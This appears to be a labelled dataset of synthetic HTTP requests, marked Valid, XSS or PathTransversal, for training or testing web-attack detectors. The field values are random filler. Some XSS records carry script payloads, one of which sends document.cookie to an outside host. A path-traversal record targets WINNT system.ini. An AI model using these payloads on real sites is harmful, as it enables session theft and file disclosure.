Referer: /eL6d/xt8nc/ONolwtmn/stlsnb/ta8Iso.swf
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/8.0 (Windows; U; WinNT 2.0; ay-ae; rv:4.2.7) Gecko/57134556
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0762x683
Via: eesaT9/1.2 www.iu4tgi.html, 9.6 www.I2srcoiS.jpeg
Transfer-Encoding: identity
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 36.56.242.165
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38075
Start - Id: 30176
class: Valid
GET /ewJYCO1.aspx?zaoari4e=n_K&ebytkmenisei=3747068398&shl=nsns&eslmydnaiL1u=5715 HTTP/1.1
Host: www.snht2di.net
Connection: keep-alive
Accept: image/*, image/png;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, compress;q=0.4, deflate;q=0.4
Accept-Language: eser-A6, hdsGtp-cslow;q=0.0, rao-n
Cache-Control: only-if-cached
Client-ip: 193.181.58.13
Cookie: faarualH1vdt=shtGbtrrmochaaesstbv;9MMWBtincludeki=ttonnbk
Cookie2: $Version="388"
Date: Wed, 04 Apr 07 12:29:13 UTC
ETag: "9WYNx2LplI72ki4IPG"
Expect: itel=TtAissOv
From: n30oip@sye2lHtos.gov
If-Modified-Since: Tue, 21 Oct 08 16:51:45 UTC
If-Unmodified-Since: Wed, 21 Jun 06 23:33:06 UTC
If-Match: *
If-None-Match: "wCV3lrmngQrNoKbwF"
If-Range: Fri, 10 Jun 05 10:33:52 CET
Max-Forwards: 1071
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: NTLM a2dpdGhycGx0b3RzeGVlbnNyYTdyOHJzcnRwNWVpdGFhQ2FhaXI=
Range: 77-,-72,-70
Referer: /tenoa/P0rB/os8YtMY.txt
TE: chunked;q=0.9,trailers
Trailer: Upgrade
User-Agent: 6E0xzQsDdI http://www.3nms.de
UA-CPU: Sparc
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 7.6 www.sagrS.png, 8.9 www.R5icA.jpeg
Transfer-Encoding: deflate
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30176
Start - Id: 19490
class: Valid
GET /hhibgt76zgatodrmhE/iXLEiSgTD/mgNqaaehdee2ktebva0/hhh/aoouoaadKtda93l/reen/7ex.fC.jpg?HF2vu%u=532636&ltonatbanbe3=24364&e9ntsrADO8n=71&afBrt=%29umnw&lromwtnspaF=27163294 HTTP/1.1
Host: www.ueawfiinv.gov
Connection: tc3dq
Accept: image/*;q=0.9, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 221.151.112.102
Cookie: nhintsebio4emoR=cq;FQ45_c8EPO=sacxkFQfM4tD;gjrOeeoa=formcn)zLrsdo8SwE;cu=GtTCeptahs
Cookie2: $Version="1"
Date: Tue, 14 Dec 04 24:14:48 UTC
ETag: W/"gQfMlcTr0-Xv2dG"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: oeonm@ce9paig.cz
If-Modified-Since: Wed, 03 Feb 10 17:21:11 UTC
If-Unmodified-Since: Tue, 18 Apr 06 02:57:59 GMT
If-Match: "ase5Mpwv6EeLlJb2y"
If-None-Match: *
If-Range: Sat, 29 Oct 05 12:57:13 UTC
Max-Forwards: 7
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: Auu3RC u3i3O=tNbhkuva
Range: -39876,97552-
Referer: http://osdssO.ch/rhiihn.conf
TE: trailers,deflate,deflate
Trailer: Accept-Encoding
User-Agent: ontts (epbF-2rB; eNaWfFVd6; 6alJ@XWs)
UA-CPU: StrongARM
UA-Disp: 190,715,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 570x2839
Via: 6.7 87.179.28.59:24
Transfer-Encoding: compress
Upgrade: dleen/1.5, etwist/3.0, t2dtc/2.6
Warning: 915 43.34.136.214 "dItueegnn4" 
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19490
Start - Id: 46568
class: XSS
GET /otfseh2sbGe/swHc4KTnGVdZd-P/5ruZcnnnssrgherrasy/dEL2EwIhtpassBCba3u6/rEwtplfhlrafn/hieoiisretitiswooVn/AoHe8u8i3/8MmrX@8-Sb6po/FandUO4dLmhH-U.shtml?fkd=90626&AAnkmasneefzln=+hme5iframe%7Ew7o+u&Yrat=bechowe0n2flinkaccess_lognci%7Cz&seuoner8nxrj1=fu%3De&nystMnoohr2ud=ardEs9goi1et3iqgml++&-F5l69adminhXdropO0=nrvB&telwilfltaotb=597754&saemlE2g=%3Al&teaT0traKcXpeR=rhaypStwlFisnl0&rhe9eesth1yne=5Oyjrixo HTTP/1.1
Host: 114.47.213.116
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: <div   onmouseover =    "   [alert ('shEeoVstoM');]  "   >
Accept-Language: e-5g;q=0.7, Aeps-rhi;q=0.6
Client-ip: 140.154.179.232
Cookie: 40a0tduicol=neottae;eeed=dih
Date: Sun, 06 Jan 08 12:27:38 UTC
ETag: W/"j97RIYas61cFc-Yzn"
Expect: erNalss=n3he9zcL
If-Modified-Since: Mon, 13 Sep 04 22:41:51 CET
If-Unmodified-Since: Sat, 16 Dec 06 13:09:33 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Jan 09 03:18:52 GMT
Max-Forwards: 9
MIME-Version: 3.9
Pragma: no-cache
Authorization: ncet pe2ihen=38ines
Range: 119341-,714564-
Referer: http://sgma.st/sadIr/7cGvprdo/imsE9eoe/ldzipti/s6oS9i.jsp
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Match
User-Agent: Mozilla/3.8 (X11; U; Solaris 3.7; eo-nw; rv:0.0.1) Gecko/85193008
UA-Pixels: 5605x1554
Via: 1.0 www.dpl5xto.js, 0.0 102.56.149.124:1, 1.2 www.sahos.css
Transfer-Encoding: identity
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 567 16.92.242.91:9 "a0tdogA" "Tue, 20 Sep 05 12:56:49 UTC"
X-Forwarded-For: 222.189.31.195
----: -----------------------------------------

null

End - Id: 46568
Start - Id: 47886
class: XSS
GET /ihiH2Erlml.dll?nhoCu=%3Cxml+++src++%3D%22++javascript%3A+++%5Balert+%28%27ei3%27%29%3B%5D%22++%3E&IoxT-4ctelnet=9026463&9m=4353267&ruolecqtrd2wskr=%2F%28u9eTaoA&kPuF=titTuwdcbsennBw&ybnpa=Talpitsneoi&Ibelgieot6orzev=tlttL HTTP/1.1
Host: www.lhba.net
Connection: keep-alive
Accept: text/html;q=0.5
Accept-Charset: us-ascii, x-mac-cyrillic;q=0.0, iso-8859-15, cp-936, iso-8859-3;q=0.2
Accept-Encoding: *
Accept-Language: As9-nrone, qoa-s8ooas
Cache-Control: only-if-cached
Client-ip: 109.167.174.90
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Sun, 07 Feb 10 03:39:09 CET
ETag: W/"yZNtlkR9dyH6DUBIC"
Expect: euecno=mtboEuso
From: clrwp@noorqoy.ch
If-Modified-Since: Fri, 09 Jun 06 19:55:20 GMT
If-Unmodified-Since: Fri, 25 Apr 08 06:36:25 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Mar 08 10:52:07 GMT
Max-Forwards: 7641
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: Digest algorithm=sa5s7ath
Range: 064-,-6198,422476-
Referer: /E1cypin.png
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: oRYDk7 http://www.elaajs.org
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 084x9415
Via: 5.4 228.109.113.12, 8.4 www.ste2a.png, FTP/3.0 www.4rrhde.shtml
Transfer-Encoding: compress
Upgrade: ouunlj/9.5, swaiz/2.9
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47886
Start - Id: 48060
class: XSS
GET /e7uglV8/9carelad.jpeg?nttu4e=83&tn=ieecbennitlPtizh&oe6tehBuonng=3a&ptnntATl=hoae&tentwtog61k0=2ids4&goolmh=yA304C&o75g5lPH=ah+s9t+9awest&@J.NobjectOLLlog2=%3Cbody+onload++%3D++%22+%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.meettima.com%2Fcgi-bin%2Fch.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E&uezcGm0e6serla=22476245 HTTP/1.0
Host: www.5mpd6uboS.be
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 168.194.28.89
Cookie: 6b5br= ya;bhoinT=758722;oramnaaH=91022;osbO=0764012
Cookie2: $Version="9"
Date: Wed, 14 Nov 07 06:46:01 UTC
ETag: W/"@AY44BLRCYw-DcLtsp"
Expect: niHibO
If-Modified-Since: Wed, 12 Jul 06 16:50:46 UTC
If-Match: *
If-None-Match: "nxswnkQNfG669Sdi1"
If-Range: *
Max-Forwards: 5451
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Yean xazroh=heTobre
Authorization: sedh aaieeArs=mnoE
Referer: http://pcl0lE.st/uvhnptd/7Epotek/otn8qor4/iegyt/oLes.zip
User-Agent: hg4@RsXV8C http://www.dnoo.uk
UA-CPU: PowerPC
UA-Pixels: 8331x5573
Transfer-Encoding: Hboytr
Upgrade: edtthr/9.5, Yast/6.8, ti2epi/5.7, tgb0/4.2
Warning: 781 www.isNI.css "dzC8lnsdienehnu3Ca" "Sat, 10 Mar 07 07:20:14 GMT"

null

End - Id: 48060
Start - Id: 45912
class: PathTransversal
GET /qQjl/riertt1tR/Vaou/23@0lh6gC47Tzbs/etzV/hrhUez2Z3JdjSc_/ek4_IZnwy/hEdWrUPmQa.ic@fG4Mm/N9V-uexeclSbgsoundA/sedsreEwbbetaela.jsp?dsrElus4=r6%28eogyo&2nfQ0=%40ma5telnet&k0cpell=6&s1_nq40YUD8R=hDt&ouootoc=8457077344&vn=3&nicEpttv=lp&hp5uusrwz8=0iejsr%3CIchildKh%7Eoa+&di=..........................WINNTsystem.ini&E_lL.admin=RrobR4gr&elpeje0=o9Txat9c&UuSEh=43796218 HTTP/1.0
Host: www.wmtonelRem.ch
Connection: S1cndrtm
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: Gel=9l
Client-ip: 81.146.184.214
Cookie: hacsar8qmpmtt=or<uT$mphp6j+li&tma;sqs=03234472;aAn4t5c5tr=shdno
Cookie2: $Version="230"
Date: Tue, 23 Jun 09 04:07:35 UTC
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Fri, 18 Dec 09 14:51:12 UTC
If-Unmodified-Since: Tue, 13 Mar 07 16:06:10 CET
If-Match: *
If-None-Match: *
If-Range: "gyrQkZ1VE0FDQxsvxn6"
Max-Forwards: 152
MIME-Version: 1.5
Pragma: wnie='tiat'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest realm
Range: -106180,0973-,3598-
Referer: http://www.gaiium.gov/7eeif/aRt1Oha/gS6efi/eDwisfd.swf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.3 (compatible; Konqueror/9.8; Linux i586; lbaaYtmnh2; 11Locnrvb; ozuvh0reS)
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/3.4 www.r9rld09u.htm, 2.0 www.giOe.tiff
Transfer-Encoding: compress
Upgrade: fes/4.2, eismN/3.9
Warning: 042 www.os8qi.css "tlxuhcset" "Thu, 03 Dec 09 03:33:47 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 9152638367
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45912
Start - Id: 33864
class: Valid
POST /o-HzA0MOl9.m_/wG/s17EJmlK/mD6/iA44O/buGGtI._k9qkWK3txP6c/g8fnndssopad4patw/hleo/tyMclfTw-b/nre.jpeg? HTTP/1.0
Content-Length: 229
Content-Language: asvrbnCo,e
Content-Encoding: compress
Content-Location: /raash21o/ieeatii/ta4o.exe
Content-MD5: aGlvZTR3Y281cklhc3Vlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Sun, 23 Nov 08 21:40:02 CET
Host: 77.181.206.121:80
Connection: 7cjuFmrs
Accept: audio/*;q=0.3
Accept-Charset: cp-936;q=0.0, hz-gb-2312;q=0.2, cp-936;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=0
Client-ip: 148.121.124.137
Cookie: Eai04ep=5;0ueEEwstos4Uzr= oia)teopen
Cookie2: $Version="6"
Date: Sat, 05 Jan 08 24:46:13 UTC
ETag: "fQ-1cn8ZVzi.yxkm"
Expect: 100-continue
From: tdove@2rii.it
If-Modified-Since: Tue, 07 Nov 06 11:43:58 CET
If-Unmodified-Since: Wed, 07 Oct 09 01:02:18 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Mar 09 21:27:03 CET
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="b7A91bFAfcF18BAd62A7dc647bD5e17A"
Authorization: Basic ZXRxY2g5ODppZWJq
Range: 232-8
Referer: /cnvt6q/9fro.mpg
TE: gzip,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (compatible; ejIhtre; WinNT; e0tse; psdergts)
UA-CPU: StrongARM
UA-Disp: 260,747,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: 1.3 20.66.165.144
Transfer-Encoding: identity
Upgrade: dotrMt/4.5, 3ae/5.5, deeebe/8.6, ose4e/4.6, einu/5.3
Warning: 149 www.pnpgcar.gif:63794 "ttaegM" "Wed, 05 Sep 07 15:49:05 UTC"
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ho=oarnmaahix&tzuUpIt0krn=tRlD9cC3z1D&oHece0=s&wr0xe= o71&lhlwtaooSe=mey&1_Nl=mrfromehsdstoyOhu&pi7ai=69&qjzpasswdMd=uvlseeyE&01inon=0944&Mx4tsnsretc6a=5103823980&execfDqQtIh=hF&W9WHQZDc0XC=02hkia4weine&NMemco5tea=rSge40fU68ly4ae

End - Id: 33864
Start - Id: 32199
class: Valid
GET /8r@C3lt/qiyieo/2neoaenacowheeSrie/balD.jpg?shn8e=8&ywrlbo6esrnee=esy7nRkyn HTTP/1.1
Host: www.em27.de
Connection: icr3
Accept: application/zip
Accept-Charset: ks_c_5601-1987;q=0.2, euc-jp;q=0.0, x-mac-korean, koi8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale=8415
Client-ip: 168.109.157.75
Cookie: norytNTssoeon=56558;Obkc9=mw;roNp=lFfmW-J4gFs;ne4uow=N 
Cookie2: $Version="60"
Date: Wed, 29 Jul 09 01:20:36 GMT
ETag: "2pWs8hrAWmRsG05H"
Expect: Rarwce=ztdSeore;sbpvwtEE=0xmcltO
From: zxtk@taedSwvsh.gov
If-Modified-Since: Tue, 26 Jun 07 23:00:13 CET
If-Unmodified-Since: Tue, 18 Oct 05 08:05:55 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Jul 05 04:18:00 GMT
Max-Forwards: 2
MIME-Version: 7.1
Pragma: etdERomd='j'
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: Basic NWVzZWg6cXlEdDhhQWg=
Range: -31011,02795-
Referer: /jokho1s/z8bl/ornih/esttanjc.mp3
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.8 (Windows; U; Win98 8.4; a8-cb; rv:2.5.5) Gecko/96570632
UA-CPU: 68000
UA-Disp: 666,662,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9868x2835
Via: FTP/4.9 246.60.152.57
Transfer-Encoding: compress
Upgrade: wahas/0.3, g2i27/7.9, nondad/8.9, en7/2.8, tgms/5.0
Warning: 807 86.138.171.101:76709 "oswel2" "Mon, 10 Sep 07 10:52:59 CET"
X-Forwarded-For: 54.1.46.142
X-Serial-Number: 76488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 32199
Start - Id: 815
class: Valid
GET /rOeMrH.jWqJb7F.PX/nphmt0re/iH/tWoE/ao1ntAutnn/hdo/nehsu3eoot/vujAq63Zdt/n5asnjhSblinu/ezhciFa/tye0mrPtsspc/ttf2-iZ81n@L93Bu0hXi.asmx?XDwindow.openwrLmmKXd=sicbgSooog0hl&geemokaneneJl=753932&naetp=59252&oebrraghN=taA&dm6=%7E+a&Iw=95932 HTTP/1.1
Host: 238.96.129.183
Connection: keep-alive
Accept: audio/basic, text/xml, application/*;q=0.3
Accept-Charset: iso-2022-kr
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 97.242.61.48
Cookie: csr=4287;aeyaee6latee=25961214;ihtpass5-m1f5=33667;sd9oen=e;re9=ortrai;d0dsAnthen9mtav=h6XeAi6eA
Cookie2: $Version="0"
Date: Sun, 31 Jan 10 03:04:30 CET
ETag: "p0LNSbZTLL2tygrWD"
Expect: nl9d
From: otea@mcanstwra.de
If-Modified-Since: Thu, 31 Aug 06 09:03:38 UTC
If-Unmodified-Since: Mon, 04 Jun 07 19:46:07 CET
If-Match: "Fmzyyq8KZklVJ3KS"
If-None-Match: "cwnysouRmiJaqPqR"
If-Range: Mon, 05 Feb 07 14:10:46 CET
Max-Forwards: 206
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: nuemo snes=hteei
Authorization: Digest username="y5ce"
Range: -5014,811909-578591
Referer: http://www.aB49Jt.ch/ah9f8cm.doc
TE: chunked;q=0.8,chunked,deflate
Trailer: If-Match
User-Agent: Mozilla/5.9 (Windows; U; Win98 4.6; et-ez; rv:9.7.4) Gecko/40958238
UA-CPU: MIPS
UA-Disp: 764,3407,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9683x567
Via: tr9ar0/5.8 www.rsb9.js, 9aajip/7.6 138.231.90.172:38422, 6.3 www.wdeel.jpg
Transfer-Encoding: gzip
Upgrade: 5do/3.7, s6EEao/4.9, trako/1.5, iciSuo/9.5
Warning: 424 www.o4ylbeo1.html "eOaoepcehwUc" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 815
Start - Id: 46526
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: www.t8LoNorr.de
Connection: dtoaE
Accept: audio/x-wav
Accept-Charset: x-mac-arabic, utf-7;q=0.2, x-mac-ce, macintosh;q=0.5, iso-8859-9
Accept-Encoding: *
Accept-Language: aaapseu-mjgs, 8ualnusw-Eaea;q=0.0, 2l-ymh;q=0.1
Cache-Control: no-transform
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="5"
Date: Sat, 10 Dec 05 17:17:57 UTC
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 08 May 04 01:24:17 UTC
If-Unmodified-Since: Thu, 11 Aug 05 14:03:30 GMT
If-Match: *
If-None-Match: "C0265eK76TMkHFOOvS"
If-Range: "39BfhVaP4oOWHRYG@"
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: /rlth/aHyc/dasnkcpn/tu5e/en2a.aspx
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: Mozilla/8.2 (compatible; Konqueror/2.2; Win 9x; at3tAnewt; eET5t)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/2.6 www.nRlS.tiff
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46526
Start - Id: 5427
class: Valid
POST /nE/oem/dqG-X/sePmd.jpg? HTTP/1.1
Content-Length: 135
Content-Language: q2,bseeeNc
Content-Encoding: compress
Content-Location: http://am2eorTt.it/77enuM/sibeasea.tiff
Content-MD5: dWVud2dhbHR5aXNSbHcwaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 20:50:02 GMT
Last-Modified: Tue, 30 Dec 08 09:33:57 UTC
Host: 18.81.58.137:80
Connection: close
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: 
Accept-Language: esaomt-meere, dooib-u, eoaAioee-ai, nbuui9p-e
Cache-Control: max-age=7
Client-ip: 143.152.60.110
Cookie: kuo=42571;eCGIS2=passwd %u;ycc2tr=0288;xepVaoftN6rna2m=ovK_wu9a5
Cookie2: $Version="13"
Date: Sat, 18 Dec 04 05:03:04 UTC
ETag: W/"EjPQdMCEga0aWATWsQg"
Expect: eltev=wilefet
From: duemse@aiti.it
If-Modified-Since: Thu, 14 Feb 08 15:13:59 GMT
If-Unmodified-Since: Tue, 02 Feb 10 22:09:33 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Feb 05 13:43:08 CET
Max-Forwards: 5357
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic SWF6OWNyOmNlZk50
Authorization: Basic eFI5OGVlOnJ5dlR5ZG90
Range: 11-,07-65786
Referer: http://www.i6Ntsa1b.ch/lWii.png
TE: trailers
Trailer: Expect
User-Agent: Mozilla/8.0 (X11; U; SunOS sun4u 5.7; oS-th; rv:5.2.5) Gecko/81741835
UA-CPU: MIPS
UA-Disp: 1986,145,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 375x4615
Via: FTP/1.6 www.di7hp.tiff:46
Transfer-Encoding: compress
Upgrade: amueL/0.0, Etejai/3.0, Exil5t/1.5, tzs/6.8
Warning: 694 185.246.0.14:2 "petyplftininahn5enz" "Fri, 15 Feb 08 05:48:04 GMT"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ftcirpEsee=9869954161&hsIrbeaeu=wgobgsounddeletecmocha3<oEti nr&bZ39m=anm43dyxdsa21ol&dOPvhavingU==fs&o24g35nu79=dNL9WoHX&aqeot=434

End - Id: 5427
Start - Id: 27199
class: Valid
GET /B0SwherePCincluderDcopy6sY./mtti/mtihSewaabLwo5n63mng/htacces1CTCt.PS8/syhttpwget9xmlYibindocument.1OoZ/msAejTrognstwjsnr/8WBvSZB20nSTqV/estza7aP/8csNm/onnh00rwgeioneKharLa/y_U9i.cfm?dassniandgariek=44580&c6ML=rtihapt0qoUe&omj6lp5Omtt6ser=yscyDuWxs&cHexnu=%3Cu4&ddd8teiro=n4e3Te&aDNu7fGn=3&b.UstdinVPbJL=4&lutieee=eJgsJev&lkio=7038205&UhdAov=elih&mssiwe9r=noeUKy&fS7yyd9eairle3e=sadea&itgAaol8eramnp=oioTarca+i&0xlikelGQZaccept=%7E%7E&ljtm6=1iiemx4daerIEoses HTTP/1.1
Host: 212.86.191.132:185
Connection: amek6tus
Accept: */*;q=0.9
Accept-Charset: x-mac-ce;q=0.0, iso-8859-8-i;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: o-e;q=0.0, en5am-st;q=0.3, oamittx-wxte7;q=0.2, ikop98-5vin;q=0.0
Cache-Control: eTt9t=9nhersat
Client-ip: 136.58.92.207
Cookie: eAL=9h3um-x
Cookie2: $Version="781"
Date: Tue, 13 Jul 04 06:01:26 CET
ETag: W/"-gDgRdYF8mUBBRz"
Expect: xped9b5l
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Thu, 17 Nov 05 06:32:49 UTC
If-Unmodified-Since: Wed, 14 Nov 07 07:11:35 CET
If-Match: "i9Vo_4W3KlM62gQh"
If-None-Match: *
If-Range: Tue, 20 Jun 06 18:04:33 UTC
Max-Forwards: 3200
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: emRo ot5Et=ihrH4
Range: 8738-95
Referer: http://www.RpizS0n.net/etnfe/urruh/uoot/2eeeSwas/ttif.doc
TE: trailers
Trailer: Connection
User-Agent: lw4wvLa (l1HLKK68Z; aT-RUv; hfeinqv; 3Y9fkx.bH)
UA-CPU: x86
UA-Disp: 451,9242,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3319x950
Via: HTTP/4.6 www.rovq.gif:0, HTTP/9.3 213.132.249.172
Transfer-Encoding: gzip
Upgrade: szAfD0/8.5, elb/6.5
Warning: 205 www.ei0rwv4l.html "chsie5ekaqdatn" 
X-Forwarded-For: 202.203.219.213
X-Serial-Number: 437437535
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27199
Start - Id: 31220
class: Valid
GET /isss8Chaoimeo/ibsec5Doeqgtsd2j/Eemll4s/3connectWybgsoundRwget/rRMVAlZ71byrd/oQZHhhw6L./vT/smeD/e.KsRF6mf8f3@GCx.8q.sh?trbaTieinZ=xstdnnatiahon3%25&jlHe=ltbodyfo8&ewylhhksair=nZDuVc&Ton4lg6zix=eta&o5T=3EseebHxeisoa&ca=+ere-re%25i&dsi=Qgxiiiatmnete0&mmNeDriysLte=et-eyhPcRxQp&a6n2e6trrhefht=5115&6ZLqjQN3Eqg=nph-9&sw=Vftrecrittdravab HTTP/1.1
Host: www.hIednd.ch
Connection: 6iesbe
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, identity;q=0.6, gzip, compress
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 125.51.6.162
Cookie: Psiwrnelneeey=8719722;9teyvitno=1;idtmzOeosas=8et
Cookie2: $Version="8"
Date: Fri, 13 Mar 09 01:41:29 GMT
ETag: W/"FBV@rizt5I.Cy2.tkY"
Expect: 100-continue
From: RaorT@taierr2.de
If-Modified-Since: Sun, 11 May 08 19:37:15 UTC
If-Unmodified-Since: Fri, 03 Jul 09 12:20:12 CET
If-Match: *
If-None-Match: "tK9.-dv6rBN_2c7"
If-Range: Fri, 23 Jun 06 16:27:00 CET
Max-Forwards: 2754
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM cjNlc2Nqc3dzMjNhZDc1eW5pbGN0d21laXpvZHNhZXRuNXg=
Authorization: Basic dGVuMWVoOnRnZ2Zibg==
Range: 8-
Referer: http://www.iyla.ch/biEpYnst/yeepet/oedri/eoC7/nudvE.zip
TE: gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.0 (compatible; MSIE 0.1; Open BSD i386; lEisFf; mrGhnsa)
UA-CPU: StrongARM
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4598x453
Via: IRbm/4.3 www.eloelo.html, 1.6 www.rhit8n.png:4107, dmihia/2.1 180.15.78.199
Transfer-Encoding: identity
Upgrade: tehdl/3.7, dmy4i/4.8, yche/8.1, run/1.6
Warning: 470 www.PmqSon.tiff "etyxjzn" "Sat, 18 Jul 09 18:15:29 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 90454333
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31220
Start - Id: 28111
class: Valid
GET /Lmeet0ndter/3ooioek/esamiotnOstnu/ehngezleobsusat/edn3jS/FnullahttpsbIPRalikeu1B/kDyWKxraUgdu/nd8aQ7NevlM.EK_/igtyde/tOttsc.js?ic7htoaZrcdstlx=pigghn%27uzo&xvElee=4472063791&asE2Z3SyfT=cfIUNjT&8l=sJel9dngeu HTTP/1.0
Host: 58.57.164.229:597
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
